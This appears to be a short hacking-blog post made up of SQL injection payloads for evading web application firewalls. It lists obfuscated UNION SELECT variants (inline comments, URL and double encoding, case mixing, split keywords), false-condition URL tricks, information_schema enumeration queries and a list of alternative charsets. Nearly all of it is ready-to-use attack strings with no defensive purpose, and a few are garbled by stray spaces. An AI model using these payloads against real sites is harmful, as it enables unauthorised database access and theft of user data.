This is for who knows sql injection. Sometimes there will be a 403 forbidden error or not acceptable error its because of the WAF (web application firewall) you can bypass this by using the following queries. If u dont know sql injection you can learn it HERE
Order By Not Working?
You can simply bypass it by using group by instead of order by
Union Select Bypassing::
union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
after id no. like id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
False The Url::
=-id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select
Order Bypassing do like this
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where table_schema=database()
unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)
used with order::
convert()using ascii)
unhex(hex())
If ascii dont work you could try:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8
source :
http://hack2play.blogspot.com
No comments:
Post a Comment